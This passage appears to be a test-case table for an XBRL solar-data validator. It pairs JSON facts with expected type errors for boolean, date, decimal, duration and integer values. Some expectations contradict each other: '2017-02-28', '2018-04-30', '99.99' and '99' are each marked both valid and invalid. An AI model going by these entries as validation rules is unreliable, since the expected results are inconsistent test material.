"aspects": {
"concept": "solar:MeasuredEnergyAvailabilityPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "Aspects is missing", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "93.26"
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "Concept is missing", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "93.26",
"aspects": {
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "Entity is missing", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "93.26",
"aspects": {
"concept": "solar:MeasuredEnergyAvailabilityPercent",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MasterPurchaseAgreement", "Non-nillable value is set to null", 3, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": null,
"aspects": {
"concept": "solar:PreparerOfMasterPurchaseAgreement",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "True",
"aspects": {
"concept": "solar:MonthlyOperatingReportAvailabilityOfDocument",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:MonthlyOperatingReportAvailabilityOfDocument",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:booleanItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "non-boolean",
"aspects": {
"concept": "solar:MonthlyOperatingReportAvailabilityOfDocument",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:booleanItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "true",
"aspects": {
"concept": "solar:MonthlyOperatingReportAvailabilityOfDocument",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:booleanItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "false",
"aspects": {
"concept": "solar:MonthlyOperatingReportAvailabilityOfDocument",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:booleanItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "1",
"aspects": {
"concept": "solar:MonthlyOperatingReportAvailabilityOfDocument",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:booleanItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "0",
"aspects": {
"concept": "solar:MonthlyOperatingReportAvailabilityOfDocument",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:booleanItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "1.0",
"aspects": {
"concept": "solar:MonthlyOperatingReportAvailabilityOfDocument",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:booleanItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "0.0",
"aspects": {
"concept": "solar:MonthlyOperatingReportAvailabilityOfDocument",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-01-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-01-31",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-02-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2017-02-28",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-02-28",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2019-02-28",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2020-02-29",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-03-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-03-31",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-04-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-04-30",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-05-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-05-31",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-06-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-06-30",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-07-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-07-31",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-08-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-08-31",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-01-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-09-30",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-10-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-10-31",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-11-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-11-30",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-12-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-12-31",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-13-02",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-01-32",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2016-02-30",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2017-02-28",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2019-02-29",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2020-02-30",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-03-32",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-04-30",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-05-32",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-06-31",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-08-32",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-09-31",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-10-32",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-11-31",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-12-32",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-1-01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018-01-1",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2018_01_01",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "01-01-2018",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "01/01/2018",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:dateItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:MonthlyOperatingReportEndDate",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:MonitoringSolutionSoftwareVersion",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.0",
"aspects": {
"concept": "solar:MonitoringSolutionSoftwareVersion",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "-99.99",
"aspects": {
"concept": "solar:MonitoringSolutionSoftwareVersion",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99",
"aspects": {
"concept": "solar:MonitoringSolutionSoftwareVersion",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type xbrli:decimalItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:MonitoringSolutionSoftwareVersion",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type xbrli:decimalItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:MonitoringSolutionSoftwareVersion",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "System", "value is not legal for type xbrli:decimalItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:MonitoringSolutionSoftwareVersion",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "P1Y",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "PT1004199059S",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "PT130S",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "PT2M10S",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "P1DT2S",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "-P1Y",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "P1Y2M3DT5H20M30.123S",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:durationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:durationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "1Y",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:durationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "P1S",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:durationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "P1-Y",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:durationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "P1M2Y",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:durationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "P1Y-1M",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:durationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:durationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:durationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type xbrli:durationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid",
"aspects": {
"concept": "solar:EstimationPeriodForCurtailment",
"entity": "JUPITER",
"period": "2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "WashingAndWasteAgreement", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99",
"aspects": {
"concept": "solar:WashingAndWasteFrequencyOfWashing",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "WashingAndWasteAgreement", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "-99",
"aspects": {
"concept": "solar:WashingAndWasteFrequencyOfWashing",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "WashingAndWasteAgreement", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "0",
"aspects": {
"concept": "solar:WashingAndWasteFrequencyOfWashing",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "WashingAndWasteAgreement", "value is not legal for type xbrli:integerItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:WashingAndWasteFrequencyOfWashing",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "WashingAndWasteAgreement", "value is not legal for type xbrli:integerItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:WashingAndWasteFrequencyOfWashing",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "WashingAndWasteAgreement", "value is not legal for type xbrli:integerItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99",
"aspects": {
"concept": "solar:WashingAndWasteFrequencyOfWashing",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "WashingAndWasteAgreement", "value is not legal for type xbrli:integerItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid",
"aspects": {
"concept": "solar:WashingAndWasteFrequencyOfWashing",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "9999.99",
"aspects": {
"concept": "us-gaap:PrepaidExpenseCurrentAndNoncurrent",
"entity": "JUPITER",
